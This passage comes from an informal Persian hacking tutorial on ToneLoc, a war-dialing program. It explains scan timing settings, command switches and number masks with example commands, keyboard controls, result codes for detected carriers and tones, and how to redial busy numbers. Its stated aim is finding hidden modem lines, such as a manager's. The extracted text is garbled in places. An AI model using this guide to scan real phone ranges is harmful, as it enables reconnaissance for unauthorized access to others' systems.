ﭼﻨﺪ ﺧﻂ ﺕﻠﻔﻦ اﺱ ﺖ ﮐ ﻪ ﻣﻌﻤ ﻮﻻ ﺏﺎی ﺪ ﺏ ﺮای ﺏﺮﻃ ﺮف ﮐ ﺮدن ای ﻦ‬ ‫ﻋﻴﺐ از ﭼﻨﺪ ﺏﺎر اﺟﺮای هﻤﻴﻦ ﺏﺮﻧﺎﻣﻪ ﺏﻪ ﺻﻮرﺕﯽ ﮐﻪ ﺏﺮای هﺮ ﺏﺮﻧﺎﻣﻪ ﭘﻮرت ‪ COM‬ﻣﺠﺰایﯽ ﺕﻌﺮیﻒ ﮐﺮد ﭘﻮﺷﺶ دادﻩ ﺷﻮد‪.‬‬ ‫یﮏ ﺱﻮال ﺧﻮب ایﻦ اﺱﺖ ﮐﻪ ‪ Baud rate‬ﭼﻴﺴﺖ ؟ در ﺟﻮاب ﺏﺎی ﺪ ﮔﻔ ﺖ ای ﻦ ﻓﻘ ﻂ ﺱ ﺮﻋﺖ ﺏﺮﻗ ﺮاری ارﺕﺒ ﺎط ﻣ ﻮدم اﺱ ﺖ و ه ﻴﭻ ﺕ ﺎﺙﻴﺮی ﺏ ﺮ روﻧ ﺪ‬ ‫ﺱﺮیﻊ ﺷﺪن اﺕﺼﺎل ﻣﻮدم ﺏﺎ ﻣﻮدم هﺎ را ﻧﺪارد‪.‬‬ ‫ﻣﻨﻮی ‪: Scan Options‬‬

‫ایﻦ ﻣﻨﻮ اﺱﺎس ﮐﺎر ﻣﺎ اﺱﺖ و ﺏﺎیﺪ ﺏﻪ ﺻﻮرت ویﮋﻩ ﻣﻮرد ﺏﺮﺱﯽ ﻗﺮار ﺏﮕﻴﺮد‪.‬‬ ‫ﺷﺎیﺪ ﻧﻴﺎز ﺏﺎﺷﺪ ﺏﺎ ایﻦ دو ﮔﺰیﻨﻪ یﮏ ﮐﻤﯽ ﺏﺎزی ﮐﻨﻴﺪ ﺕﺎ ﻣﻘﺪار ﺏﻬﺘﺮیﻦ را ﺏﺮای وﺽﻌﻴﺖ ﺧﻮد ﭘﻴﺪا ﮐﻨﻴﺪ ‪.‬‬ ‫‪1-Wait Delay‬‬ ‫‪2-Between-Call Delay‬‬ ‫ﻣﻘﺪار ﮔﺰیﻨﻪ دوﻣﯽ و اﺻﻼ هﺮ دو ﺏﺮ ﺡﺴﺐ ﻣﻴﻠﯽ ﺙﺎﻧﻴﻪ اﺱﺖ ﮐﻪ دوﻣﯽ زﻣﺎن ﺏﺮای ریﺴﺖ ﮐﺮدن ﻣﻮدم ﺏﺮای ﺷﻤﺎرﻩ ﮔﻴ ﺮی ﻣﺠ ﺪد اﺱ ﺖ ﮐ ﻪ ﺏ ﺴﺘﮕﯽ‬ ‫ﺏﻪ ﻣﻮدم ﺧﻂ و ﺷﻤﺎرﻩ هﺎیﯽ ﮐﻪ دارد ﻣﻴﮕﻴﺮد دارد زﻣﺎن ﺏﻴﺸﺘﺮ ﺏﺎﻋﺚ ریﺴﺖ ﺷﺪن ﺏﻬﺘﺮ ﻣﻮدم ﺕﻮﺱﻂ ﻧﺮم اﻓﺰار ﻣﻴﺸﻮد ﻣﺜﻼ ‪ ۴٠٠‬ی ﺎ ﺡ ﺪاﮐﺜﺮ‪، ۵ ٠٠‬‬ ‫ﭘﻴﺶ ﻓﺮض ایﻦ زﻣﺎن‪ ٣٠٠‬ﻣﻴﻠﯽ ﺙﺎﻧﻴﻪ اﺱﺖ ﮐﻪ ﺧﻮب اﺱﺖ‪ .‬ﮔﺰیﻨﻪ اول ‪ Wait Delay‬دارای اهﻤﻴﺖ ویﮋﻩ ایﯽ اﺱﺖ ایﻦ ﮔﺰیﻨﻪ ﻣﻌﺮف ﻣﺪت زﻣ ﺎﻧﯽ‬ ‫اﺱﺖ ﻧﺮم اﻓﺰار ﻣﻨﺘﻈﺮ دریﺎﻓﺖ ﭘﺎﺱﺦ ﻣﯽ ﻣﺎﻧﺪ‪ .‬ﭘﺲ از ایﻦ رو ﻣﯽ ﺕﻮان ﺏﺎ ﺕﻮﺟﻪ ﺏﻪ ﺕﻌﺪاد ﺷﻤﺎرﻩ هﺎی ﺕﻠﻔﻦ و ایﻦ زﻣﺎن} ﻣﻨﻈ ﻮر‪، { Wait Delay‬‬ ‫) از‪ ،‬زﻣﺎن ‪ Between-Call Delay‬ﺏﻪ ﻋﻠﺖ ﮐﻮﭼﮑﯽ ﻣﯽ ﺕﻮان ﺻﺮف ﻧﻈﺮ ﮐ ﺮد ( ﻣ ﺪت زﻣ ﺎن ﮐ ﺎر را ﺕﺨﻤ ﻴﻦ زد ﻣ ﺜﻼ زﻣ ﺎن ‪Wait Delay‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬

‫ﺻﻔﺤﻪ‬

‫‪١١‬‬

‫در ﺡﺎﻟﺖ ﭘﻴﺶ ﻓﺮض ‪ ۴۵٠٠٠‬ﻣﻌﺎدل ‪ ۴۵‬ﺙﺎﻧﻴﻪ ﻣﯽ ﺏﺎﺷﺪ ﭘﺎس ﺏﺎ یﮏ ﻣﺤﺎﺱﺒﻪ ﺱﺨﺖ ریﺎﺽﯽ ﻣﯽ ﺕﻮان ﻓﻬﻤﻴﺪ ﮐ ﻪ اﮔ ﺮ ﻣ ﺎ ﺏﺨ ﻮاهﻴﻢ ‪ ١٠٠٠‬ﺷ ﻤﺎرﻩ را‬ ‫ﺕﺴﺖ ﮐﻨﻴﻢ ﻧﻴﺎز ﺏﻪ یﮏ ‪ ١۶‬ﺱﺎﻋﺘﯽ زﻣﺎن اﺡﺘﻴﺎج داریﻢ!!‬ ‫اﻟﺒﺘﻪ ﻣﻴﺘﻮان یﮏ ﺷﺐ ﺕﺎ ﺻﺒﺢ ﻓﺮض ﮐﺮد ﮐﻪ هﻢ ﭘﻮل ﮐﻤﺘﺮی ﺁب ﺏﺨﻮرد هﻢ ﮐﺴﯽ ﻣﺰاﺡﻢ ﻧﺸﻮد‪.‬وﻟﯽ ﺏﻬﺘﺮ اﺱﺖ ایﻦ ﻋﺪد را ﺏﻪ ‪ ٣۵٠٠٠‬ویﺎ‪٣٠٠٠٠‬‬ ‫ﻣﻴﻠﯽ ﺙﺎﻧﻴﻪ ﮐﺎهﺶ داد ﮐﻪ ﻣﻨﻄﻘﯽ ﺕﺮ هﻢ اﺱﺖ‪ ).‬ﭼﻮن ﻣ ﺎ داری ﻢ دﻧﺒ ﺎل ﺧ ﻂ ﺁﻗ ﺎی ﺡ ﻀﺮت ﻣ ﺪیﺮ ﻣﻴﮕ ﺮدیﻢ !!( اﻟﺒﺘ ﻪ ﻣ ﻦ ﺏ ﻪ ﺷﺨ ﺼﻪ‪ ١٠‬اﻟ ﯽ ‪ ١٢‬ﺙﺎﻧﻴ ﻪ‬ ‫ﺡﺪاﮐﺜﺮ زﻣﺎن ﺏﺮای ایﻦ یﮑﯽ ﻣﻴﮕﺰارم و زﻣﺎن ریﺴﺖ ﻣﻮدم را ﮐﻤﯽ ﺏﻴﺸﺘﺮ ﻣﺜﻼ ‪۴۵٠‬ﻣﻴﮕﺰارم ایﻦ ﻣﻨﻄﻘﯽ ﺕﺮ اﺱﺖ ﭼﻮن ﺏ ﺎ راﻩ ه ﺎیﯽ ﮐ ﻪ در اداﻣ ﻪ‬ ‫ﻣﻴﮕﻢ ﻣﯽ ﺷﻮد دوﺏﺎرﻩ ﺷﻤﺎرﻩ هﺎی را ﮐﻪ ﻓﻘﻂ ﻣﺜﻼ ‪ Timeout‬ﺷﺪن را دوﺏﺎرﻩ ﺏﺎ زﻣﺎن ﺏﻴﺸﺘﺮی ﺏﺮای اﻧﺘﻈﺎر ﺟﻮاب ﮔﺮﻓﺖ‪.‬‬ ‫ﺡﺘﻤﺎ ﮔﺰیﻨﻪ هﺎی ‪ Carrier Logging ، Logging to Disk ، Save ، DAT Files‬را ﺏﺎ ﻣﻘﺪار ‪ Y‬ﺕﻨﻈﻴﻢ ﮐﻨﻴﺪ‪.‬‬ ‫ﺧﻮب ﺡﺎﻻ ﮔﺰیﻨﻪ هﺎی ﭘﻴﮑﺮ ﺏﻨﺪی را ﺏ ﻪ ﺷ ﻤﺎ ﮔﻔ ﺘﻢ و ﺷ ﻤﺎ ﻣﻨﺎﺱ ﺐ ﺡ ﺎل ﺧﻮدﺕ ﻮن ﺁن را ﺕﻨﻈ ﻴﻢ ﮐ ﺮدﻩ ای ﺪ ﺡ ﺎﻻ ﻓﺎی ﻞ ﻣﺮﺏ ﻮط ﺏ ﻪ ﭘﻴﮑ ﺮ ﺏﻨ ﺪی را روی‬ ‫دیﺴﮏ ذﺧﻴﺮﻩ ﮐﻨﻴﺪ اﺱﻢ ﺁن را هﻢ ﺏﺎ ﺕﻮﺟﻪ ﻗﻮاﻋﺪ ﮐﻪ ﮔﻔﺘﻪ ﺷﺪ ﺏﮕﺰاریﺪ ﮐﻪ هﻢ ﺧﻮدﺕﺎن ﺏﻔﻬﻤﻴﺪ‪!!.‬‬ ‫ﻧﮑﺘﻪ ‪ :‬ﺏﺮﻧﺎﻣﻪ ‪ Tlcfg.exe‬هﻤﻴﺸﻪ ﻋﻤﻠﻴﺎت ﺧﻮد را ﺏﺮ روی ﻓﺎیﻠﯽ ﺏﺎ ﻧﺎم ‪ Tl.cfg‬اﻧﺠﺎم ﻣﻴﺪهﺪ ﮐﻪ ﺟﻬﺖ اﺱﺘﻔﺎدﻩ از ﺁن ﻻزم اﺱﺖ ﻣﺮﺕﺒﺎ ﻧﺎم اﻧﺘﺨﺎﺏﯽ‬ ‫ﺧﻮد را ﺏﺮای ﻓﺎیﻞ ﭘﻴﮑﺮ ﺏﻨﺪی ﺏﺮﻧﺎﻣﻪ را ﺏﻪ ‪ Tl.cfg‬ﺕﻐﻴﻴﺮ دادﻩ و ﭘﺲ از اﻋﻤﺎل ﺕﻐﻴﺮات دوﺏﺎرﻩ ﺁن را ﺏﻪ ﺡﺎﻟﺖ اول ﺏﺮﮔﺮداﻧﻴﺪ‪!!.‬‬ ‫ﺡﺎﻻ زﻣﺎن ﺁن رﺱﻴﺪﻩ ﮐﻪ دیﮕﺮ از ﺧﻮد ﺏﺮﻧﺎﻣﻪ اﺱﺘﻔﺎدﻩ ﮐﻨﻴﻢ!!‬ ‫ﮔﺰیﻨﻪ ) ﺱﻮیﭻ ( هﺎی ﺏﺮﻧﺎﻣﻪ را در زیﺮ ﻣﯽ ﺏﻴﻨﺪ ‪:‬‬ ‫]‪ToneLoc [DataFile] /M:[Mask] /R:[Range] /X:[ExMask] /D:[ExRange‬‬ ‫]‪/C:[Config] /#:[Number] /S:[StartTime] /E:[EndTime‬‬ ‫‪/H:[Hours] /T /K‬‬

‫و ﺕﻮﺽﻴﺢ هﺎی ﺁن‪:‬‬ ‫‪[DataFile] - File to store data in, may also be a mask‬‬ ‫‪[Mask] - To use for phone numbers Format: 555-XXXX‬‬ ‫‪[Range] - Range of numbers to dial Format: 5000-6999‬‬ ‫‪[ExMask] - Mask to exclude from scan Format: 1XXX‬‬ ‫‪[ExRange] - Range to exclude from scan Format: 2500-2699‬‬ ‫‪[Config] - Configuration file to use‬‬ ‫‪[Number] - Number of dials to make Format: 250‬‬ ‫‪[StartTime] - Time to begin scanning Format: 9:30p‬‬ ‫‪[EndTime] - Time to end scanning Format: 6:45a‬‬ ‫‪[Hours] - Max # of hours to scan Format: 5:30‬‬ ‫]‪Overrides [EndTime‬‬ ‫)‪/T = Tones, /K = Carriers (Override config file, '-' inverts‬‬

‫ﺏﺎ ﻣﺜﺎل ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ ﻣﺘﻮﺟﻪ ﺷﻮیﺪ ﻣﺜﻼ‪:‬‬ ‫‪C :\> toneloc.exe xxxx.dat / c: zzzz.cfg‬‬ ‫ﺧﻮب هﻤﺎﻧﻄﻮر ﮐﻪ ﻣﻴﺪاﻧﻴﺪ ‪ XXXX.dat‬ﺕﻤﺎم ﻧﺘﻴﺠﻪ هﺎی ﻣﺎ در ﺁن ﻗﺮار دارد و ‪ ZZZZ.cfg‬هﻤﺎن ﻓﺎیﻞ ﭘﻴﮑﺮ ﺏﻨﺪی ﻣﺎ اﺱﺖ‪ .‬ﺱ ﻮیﭻ‪ /C‬ﮐ ﻪ ﻣ ﻦ‬ ‫اﺽﺎﻓﻪ ﮐﺮدم ایﻦ ﮐﺎر را ﻣﻴﮑﻨﺪ ﮐﻪ ﺏﺮای ایﻦ ﺟﺴﺘﺠﻮ ﻓﻘﻂ از ایﻦ ﻓﺎیﻞ اﺱﺘﻔﺎدﻩ ﮐﻨﺪ و دﻓﻌﺎت ﺏﻌﺪ یﮑﯽ دیﮕﻪ را اﺱﺘﻔﺎدﻩ ﮐﻨﻢ ‪.‬‬ ‫ﺱﻮیﭻ هﺎی ‪ /M‬و ‪ /R‬و ‪ /X‬و ‪ /D‬هﻤﻪ ﺕﻘﺮیﺒﺎ یﮏ ﮐﺎر را اﻧﺠﺎم ﻣﻴﺪهﻨﺪ ﮐﻪ ﻣﻦ اوﻟﯽ را ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ) دوﺕ ﺎ اوﻟ ﯽ اﺽ ﺎﻓﻪ ﻣﻴﮑﻨ ﺪ دوﺕ ﺎ ﺏﻌ ﺪی‬ ‫ﺡﺬف(‪.‬‬ ‫ﻣﻴﺘﻮان ﺏﺎ ایﻦ ﺱﻮیﭻ ‪ /M‬ﻣﺤﺪودﻩ ﺧﺎﺻﯽ از ﺷﻤﺎرﻩ هﺎ را دﻗﻴﻘﺎ ﻣﺸﺨﺺ ﮐﺮد ﻣﺜﻞ‪:‬‬ ‫‪/m: 971-XXXX‬‬ ‫‪/m: 971-1XXX‬‬ ‫‪/m: 971-X9XX‬‬ ‫‪/m: 971-XXX3‬‬ ‫…‬ ‫ﮐﻪ ﺏﻪ ﺟﺎی ‪ X‬هﺎ ﺧﻮد ﺏﺮﻧﺎﻣﻪ ﺕﻤﺎم اﻋﺪاد ﺏﻴﻦ ‪ ٠‬ﺕﺎ ‪ ٩‬را ﺟﺎی ﺁﻧﻬﺎ ﻣﻴﮕﺰارد و ﺷﻤﺎرﻩ ﻣﻴﮕﻴﺮد‪.‬‬ ‫ﺏﺎ اﺱﺘﻔﺎدﻩ از ﮔﺰیﻨﻪ هﺎی ‪ X‬و‪ D‬ﻣﻴﺘﻮان ﻣﺤﺪودﻩ ای از ﺷﻤﺎرﻩ هﺎ را ﺡﺬف ﮐﺮد از ﺷﻤﺎرﻩ ﮔﻴﺮی ﻣﺜﺎل‪:‬‬ ‫‪C:\>Toneloc.exe xxxx.dat / c: zzzz.cfg /m: 971XXXX /d: 0000-7499‬‬ ‫هﻤﺎﻧﻄﻮر ﮐﻪ ﻣﯽ ﺏﻴﻨﻴﺪ ﻣﺤﺪودﻩ ﺏﻴﻦ ‪ ٠‬ﺕﺎ ‪ ٧۴٩٩‬را ﺏﻪ ﺟﺎی ‪ X‬هﺎ ﻧﻤﯽ ﮔﺰارد‪ S .‬و‪ e‬و‪ h‬هﻢ ﺕﺎﺏﻠﻮ ﮐﻪ ﭼﮑﺎر ﻣﻴﮑﻨﺪ!!‬ ‫ﺕﻮﺟﻪ‪ :‬ﺏﺎ اﺱﺘﻔﺎدﻩ از ایﻦ ﺕﺮﮐﻴﺒﻬﺎ ﻣﻴﺘﻮان ﮐﺎر را ﺏﻴﻦ ﻣﻮدم هﺎ ﺕﻘﺴﻴﻢ ﮐﺮد ‪.‬‬ ‫در هﻨﮕﺎم ﮐﺎر ﺏﺮﻧﺎﻣﻪ دﮐﻤﻪ هﺎی ﮐﻴﺒﻮرد ﮐﺎرهﺎی اﻧﺠﺎم ﻣﻴﺪهﻨﺪ ﮐﻪ ﻋﺮض ﻣﻴﮑﻨﻢ ‪.‬‬ ‫ﺕﻮﺽﻴﺤﺎت‬ ‫ایﻦ ﻓﺮﻣﺎن ﺷﻤﺎرﻩ ﻣﻮرد ﺏﺮﺱﯽ را ﺏﺮای ﺕﺸﺨﻴﺺ ﻧﻮع ﺱﺮویﺲ دهﻨﺪﻩ ﻋﻼﻣﺖ ﻣﻴﮕﺰارد‪.‬‬ ‫ایﻦ ﻓﺮﻣﺎن ﺷﻤﺎرﻩ را ‪ ،‬ﺷﻤﺎرﻩ یﮏ ﻣﺎﺷﻴﻦ ﻓﮑﺲ ﻋﻼﻣﺖ ﻣﻴﮕﺰارد‪.‬‬ ‫ایﻦ ﻓﺮﻣﺎن ﺷﻤﺎرﻩ را ﺏﻪ ﻋﻨﻮان یﮏ ﻣﺎﺷﻴﻦ ‪ GIRL‬ﻋﻼﻣﺖ ﻣﻴﮕﺰارد ) ﻣﺎﺷﻴﻦ ‪ GRIL‬ﺱﺮویﺲ ﭘﺎﺱﺨﮕﻮیﯽ ﺧﻮد‬ ‫ﮐﺎر از ﻃﺮیﻖ ﺻﺪای ﺽﺒﻂ ﺷﺪﻩ ﻣﯽ ﺏﺎﺷﺪ ﻣﺜﻞ ﺷﻤﺎرﻩ هﺎی هﻮاﺷﻨﺎﺱﯽ ﮐﻪ ﻣﻴﮕﻪ ﻓﻼن ﺷﻤﺎرﻩ را ﺏﺰن ﺕﺎ ﺁب هﻮای‬ ‫ﻓﻼن ﺷﻬﺮ را ﺏﮕﻢ (‪.‬‬

‫ﻧﺎم ﮐﻠﻴﺪ‬ ‫‪C‬‬ ‫‪F‬‬ ‫‪G‬‬

‫آﻣﻮزش ﻫﮏ و ﻣﻌﺮﻓﯽ ﻧﺮم اﻓﺰار ﻫﺎی ﻣﺮﺑﻮﻃﻪ ﺗﻮﺳﻂ ﺧﻮدم !!‬ ‫ﻣﯽ ﺕﻮان ﺏﺮای ایﻦ ﺷﻤﺎرﻩ ﻧﮑﺘﻪ ای ﻧﻮﺷﺖ‪.‬‬ ‫ﻋﻤﻠﻴﺎت ﺷﻤﺎرﻩ ﮔﻴﺮی را ﺏﻪ ﺡﺎل ﺕﻌﻠﻴﻖ در ﻣﯽ ﺁورد و ﺏﺎ ﻓﺸﺎر هﺮ ﮐﻠﻴﺪی اداﻣﻪ ﮐﺎر از ﺱﺮ ﮔﺮﻓﺘﻪ ﻣﯽ ﺷﻮد‪..‬‬ ‫ﻣﻮﺟﺐ ﺧﺮوج ﮐﺎﻣﻞ از ﺏﺮﻧﺎﻣﻪ ﻣﻴﺸﻮد‪.‬‬ ‫ﺷﻤﺎرﻩ ﻓﻌﻠﯽ را دوﺏﺎرﻩ ﻣﻴﮕﺮد‪.‬‬ ‫ﺏﻠﻨﺪ ﮔﻮهﺎی ﻣﻮدم را ﻓﻌﺎل و یﺎ ﻏﻴﺮ ﻓﻌﺎل ﻣﻴﮑﻨﺪ‪.‬‬ ‫‪ ۵‬ﺙﺎﻧﻴﻪ ﺏﻪ ﻣﺪت اﻧﺘﻈﺎر ﺏﺮای ﭘﺎﺱﺦ را ﻓﻘﻂ ﺏﺮای ایﻦ ﺷﻤﺎرﻩ زیﺎد ﻣﯽ ﮐﻨﺪ‪.‬‬ ‫ﺷﻤﺎرﻩ را ﺏﻪ ﻋﻨﻮان ﺱﺮویﺲ ‪ Voice Mail Box‬یﺎ ) ‪ ( VMB‬ﻋﻼﻣﺖ ﻣﻴﮕﺰارد‬ ‫ﺷﻤﺎرﻩ ﻓﻌﻠﯽ را ﮐﻦ ﺱﻞ ﮐﺮدﻩ و ﺷﻤﺎرﻩ ﺏﻌﺪی را ﻣﻴﮕﻴﺮد‪.‬‬ ‫ﺏﺎﻋﺚ ﺧﺮوج از ﺏﺮﻧﺎﻣﻪ ﻣﻴﺸﻮد‪.‬‬

‫ﺻﻔﺤﻪ‬

‫‪١٢‬‬

‫‪K‬‬ ‫‪P‬‬ ‫‪Q‬‬ ‫‪R‬‬ ‫‪S‬‬ ‫‪X‬‬ ‫‪V‬‬ ‫]‪[Spacebar‬‬ ‫]‪[Esc‬‬

‫ﺧﻮب ﺕﺎ ﺡﺎﻻ ‪ %٨٠‬از ﮐﺎر را ﺕﻤﺎم ﮐﺮدم ﻣﻌﻤﻮﻻ ﺕﻮی ﺕﻤﺎم ﺁﻣﻮزش هﺎ یﯽ ﮐ ﻪ دی ﺪم ﺕ ﺎ ﺏ ﻪ ﺡ ﺎل ه ﺮ ﮐ ﯽ ﺏ ﻪ ای ﻦ ﻣﺮﺡﻠ ﻪ ﻣﻴﺮﺱ ﻪ دیﮕ ﻪ ﺁﻣ ﻮزش ﺕﻤ ﺎم‬ ‫ﻣﻴﮑﻨﻪ وﻟﯽ اﺻﻞ ﮐﺎر از ﺡﺎﻻ ﺏﻪ ﺏﻌﺪ ﮐﻪ ﺏﻴﺸﺘﺮ هﻢ ﺕﺠﺮﺏﯽ ﻣﻦ ﺏﺎز هﻢ ﺏﻪ ﻋﻠﺖ ‪ ....‬از ایﻦ ﺟﺎ ﺏﻪ ﺏﻌﺪ ﺕﻮﺽﻴﺢ ﻣﻴﺪهﻢ‪.‬‬ ‫ﭘﺲ از ﭘﺎیﺎن ﮐﺎر ﺏﺮﻧﺎﻣﻪ ﺏﻪ ﺷﻤﺎ یﮏ ﭘﻴﻐﺎم ﻣﻴﺪهﺪ ﺏﺎ ایﻦ ﻣﺤﺘﻮا ﮐﻪ ‪ ،‬ﮐﺎر ﺕﻤﺎم ﺷﺪ ﻓﺎیﻞ ‪ XXXX.Dat‬ﺡﺎوی ﻧﺘﻴﺠﻪ ه ﺎ ﻣﻴﺒﺎﺷ ﺪ و ﺏﺎی ﺪ وی ﺮایﺶ ﺷ ﻮد‬ ‫اﻃﻼﻋﺎت ﺁن ﺏﺎزیﺎﺏﯽ و دﺱﺖ ﺧﻮش ﺕﻐﻴﻴﺮ ﺷﻮد ‪.‬در ایﻦ ﻓﺎیﻞ ﺏﻪ هﺮ ﺷﻤﺎرﻩ ‪ ١‬ﺏﺎیﺖ ﻓﻀﺎ اﺧﺘﺼﺎص ﻣﻴﺪهﺪ و ﺏﻪ ه ﺮ ﺷ ﻤﺎرﻩ ی ﮏ ﻣﻘ ﺪار ﺧ ﻮاص ﻣ ﯽ‬ ‫دهﺪ ﮐﻪ ﻧﺘﻴﺠﻪ ﻋﻤﻞ ﺏﺮﻧﺎﻣﻪ اﺱﺖ ﮐﻪ در ﺟﺪول زیﺮ ﻣﻘﺎدیﺮ و ﻣﻌﻨﯽ ﺁﻧﻬﺎ را ﻣﯽ ﺏﻴﻨﻴﺪ ‪.‬‬ ‫ﻣﻘﺪار ﮐﺎراﮐﺘﺮی‬ ‫‪UNDIALED‬‬ ‫‪BUSY‬‬ ‫‪VOICE‬‬ ‫‪NODIAL‬‬ ‫‪ABORTED‬‬ ‫‪RIAGOUT‬‬

‫ﻣﻘﺪار ﻋﺪدی‬ ‫‪00‬‬ ‫‪1X‬‬ ‫‪2X‬‬ ‫‪30‬‬ ‫‪5X‬‬ ‫‪6X‬‬

‫‪TIMEOUT‬‬ ‫‪TONE‬‬

‫‪7X‬‬ ‫‪8X‬‬

‫‪CARRIER‬‬ ‫‪EXCLUDE‬‬

‫‪9X‬‬ ‫‪100‬‬

‫ﻣﻔﻬﻮم‬ ‫هﻨﻮز ایﻦ ﺷﻤﺎرﻩ را ﻧﮕﺮﻓﺘﻪ‪.‬‬ ‫ﺱﻴﮕﻨﺎل اﺷﻐﺎل ﺏﻮدن ﺧﻂ را دریﺎﻓﺖ ﮐﺮدﻩ‪.‬‬ ‫ﺱﻴﮕﻨﺎل ﺻﺪا را ﺕﺸﺨﻴﺺ دادﻩ ‪ ).‬ﻣﻌﻤﻮﻻ ﻣﺎل دﺱﺘﮕﺎﻩ ﻓﮑﺲ اﺱﺖ(‬ ‫اﻣﮑﺎن ﺷﻤﺎرﻩ ﮔﻴﺮی وﺟﺪ ﻧﺪارد‪.‬‬ ‫از ﺷﻤﺎرﻩ ﮔﻴﺮی ﺻﺮف ﻧﻈﺮ ﺏﻪ ﻋﻤﻞ ﺁﻣﺪﻩ‪.‬‬ ‫ﺏﺮﻧﺎﻣﻪ ﺏﻪ ﻣﻘﺪار ‪ Ringout‬رﺱﻴﺪﻩ‪ ).‬ایﻦ ﻣﻘﺪار ﺁﺱﺘﺎﻧﻪ را ﻣﻴﺘﻮان ﺏﺎ اﺱﺘﻔﺎدﻩ از ﺏﺮﻧﺎﻣﻪ‬ ‫ﮐﻤﮑﯽ ‪ tlcfg.exe‬و از ﻣﻨﻮی ‪ Scan Options‬ﻗﺎﺏﻞ دﺱﺖ رﺱﯽ و ﺕﻌﻴﻴﻦ اﺱﺖ (‬ ‫ﺏﺮﻧﺎﻣﻪ ﺏﻪ ﻣﻘﺪار ‪ TIME OUT‬رﺱﻴﺪﻩ ) زیﺎد درﺏﺎرﻩ اش ﺕﻮﺽﻴﺢ دادم(‬ ‫در هﻨﮕﺎم اﻧﺠﺎم ﮐﺎر یﮏ ﺱﻴﮕﻨﺎل ﺷﻤﺎرﻩ ﮔﻴﺮی دریﺎﻓﺖ ﮐﺮدﻩ ) ‪ ٢‬ﻋﻠﺖ دارد ﮐﻢ‬ ‫ﺏﻮدن زﻣﺎن ریﺴﺖ یﮏ ﻧﻔﺮ دارد ﺏﺎ ﺕﻠﻔﻦ ﺷﻤﺎرﻩ ﻣﻴﮕﻴﺮد!! (‬ ‫یﮏ ﺱﻴﮕﻨﺎل ‪ CRRIER‬ﺕﺸﺨﻴﺺ دادﻩ !!‬ ‫ﺷﻤﺎرﻩ ﺕﻠﻔﻦ را ﺧﻮدﺕﺎن ﺏﺎ ﺕﻮﺟﻪ ﺏﻪ ﺱﻮیﭻ هﺎ ﺡﺬف ﮐﺮدﻩ ایﺪ ‪.‬‬

‫ﺏﺮﻧﺎﻣﻪ ﮐﻤﮑﯽ ‪ tlreplac.exe‬ﮐﻪ هﻤﺮاﻩ ایﻦ ﻧﺮم اﻓﺰار اﺱ ﺖ ﮐ ﺎرایﯽ ﺟﺎﻟ ﺐ دارد ﮐ ﻪ ای ﻦ ه ﻢ ﻣﻴﮕ ﻮیﻢ ‪.‬ﮐ ﺎر ای ﻦ ﺏﺮﻧﺎﻣ ﻪ ﺏﺮﺱ ﯽ ﻓﺎی ﻞ ‪ *.dat‬اﺱ ﺖ و‬ ‫ﺕﻐﻴﻴﺮ یﮏ ﻧﻮع ﺧﻮاص از ﻣﻘﺪار هﺎی ﺏﺎﻻ ﮐﻪ ﮔﻔﺘﻢ هﺮ ﮐﺪام ﭼﻪ ﻣﻌﻨﯽ دارد‪.‬ﺧﻮب ﺏﺎﻻ ﺕﺮ هﺎ ﺏﻪ ﺷﻤﺎ ﮔﻔﺘﻢ اﮔﺮ ﻣﺜﻼ زﻣﺎن اﻧﺘﻈ ﺎر ﮐ ﻢ ﺕﻨﻈ ﻴﻢ ﮐ ﺮدﻩ ای ﺪ‬ ‫ﻧﮕﺮان ﻧﺒﺎﺷﻴﺪ ﺷﻤﺎرﻩ هﺎی ﺁن دوﺏﺎرﻩ ﻣﻴﮕﻴﺮیﻢ یﺎ ﻣﺜﻼ ﺷﻤﺎرﻩ هﺎی اﺷﻐﺎل ﺧﻮب ﺏﻪ دﺱﺘﻮر زیﺮ ﺕﻮﺟﻪ ﮐﻨﻴﺪ‪:‬‬ ‫‪C:\>tlreplac.exe XXXX.dat BUSY UNDIALED‬‬ ‫ﺏﻌﺪ یﮏ ﺱﺮی ﺟﻮاب اﺱﺎس ﺏﻪ ﻗﻮل ﺧﻮدش ﻣﻴﺪهﺪ و ﻣﺎ ﻣﻴﺘﻮاﻧﻴﻢ دوﺏﺎرﻩ ﺷﻤﺎرﻩ هﺎی اﺷﻐﺎل ﺏﮕﻴﺮیﻢ ﺏﻘﻴﻪ ﮐﺎرهﺎ هﻢ ﻣﺜﻞ ﻗﺒﻞ اﺱﺖ‪.‬‬ ‫ایﻦ ﻗﻀﻴﻪ ﺏﺮای ‪ TIMEOUT‬و ‪ RINGOUT‬هﻢ ﺻﺪق ﻣﻴﮑﻨﺪ ﮐﻪ ﺏﻪ ﺟﺎی ﻗﺴﻤﺖ زرد ﻣﻴﻨﻮیﺴﻢ !!!‬ ‫یﮏ ﺏﺮﻧﺎﻣﻪ ﮐﻤﮑﯽ دیﮕﻪ هﻢ دارد ﮐﻪ ﮐﺎرش درﺱﺖ ﮐﺮدن ﻓﺎیﻞ ‪ *.dat‬ﻣﻮرد دﻟﺨﻮاﻩ ﻣﺎ ﺏﺮای ﺷﻤﺎرﻩ هﺎی ﻣﻮرد ﻧﻈﺮ ﮐﻪ اﺱﻢ ﺏﺮﻧﺎﻣﻪ ‪Prescan.exe‬‬ ‫اﺱﺖ ﮐﺎرش دیﮕﻪ ﺧﻮدﺕﻮن یﺎد ﺏﮕﻴﺮیﺪ‪ .‬ﺏﻐﻴﺮ از ایﻨﻬﺎ ‪ ٣‬ﺏﺮﻧﺎﻣﻪ ﺁﻣﺎرﮔﻴﺮی ﮐﻤﮑﯽ هﻢ دارد ﮐﻪ ﺧﻮاﻧﺪن و ﺕﺤﻠﻴﻞ را ﺏﺮای ﻣ ﺎ راﺡ ﺖ ﻣ ﯽ ﮐﻨ ﺪ از روی‬ ‫ﻓﺎیﻞ ‪.!! *.dat‬‬ ‫هﻤﻴﻦ هﻤﺶ ﺕﻮﺽﻴﺢ دادم دیﮕﺮ هﻴﭽﯽ ﻧﻴﺴﺖ ﮐﻪ ﺏﮕﻢ وﻟﯽ از ﮐﻞ و هﺪف ﻣﻘﺎﻟﻪ ای ﮐﻪ ﻣﻴﺨﻮاﺱﺘﻢ ﺏﻨﻮیﺴﻢ ﺧﻴﻠﯽ دور ﺷﺪم وﻟ ﯽ ﺏ ﺮای ﺷ ﻤﺎ 